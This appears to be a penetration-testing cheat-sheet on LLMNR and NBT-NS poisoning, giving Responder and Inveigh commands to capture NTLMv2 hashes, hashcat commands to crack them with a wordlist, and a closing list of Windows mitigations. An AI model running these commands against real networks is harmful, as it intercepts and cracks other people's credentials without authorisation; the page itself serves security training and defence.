Skip to content

LLMNR Poisoning

From Linux

https://github.com/SpiderLabs/Responder 

sudo responder -I eth0
Wait for hashes to come in Crack them with 
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

From Windows

Using Inveigh

https://github.com/Kevin-Robertson/Inveigh 

Import-Module .\Inveigh.ps1

Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y

C# Inveigh (InveighZero)

.\Inveigh.exe
We can quickly view unique captured hashes by typing GET NTLMV2UNIQUE. We can type in GET NTLMV2USERNAMES and see which usernames we have collected. This is helpful if we want a listing of users to perform additional enumeration against and see which are worth
attempting to crack offline using Hashcat.

Mitigation

  1. Select "Turn OFF multicast Name Resolution" under Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client in the Group Policy Editor
  2. Disable NBT-NS navigate to Network Connections > Network Adapter Properties > TCP/IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBios over TCP/IP". If you cannot disable for whatever reason
  3. Require Network Access Control (NAC)
  4. Require strong passwords: over 14 characters with capitals and symbols and no common words. The better the password, the longer it takes an attacker to crack the hash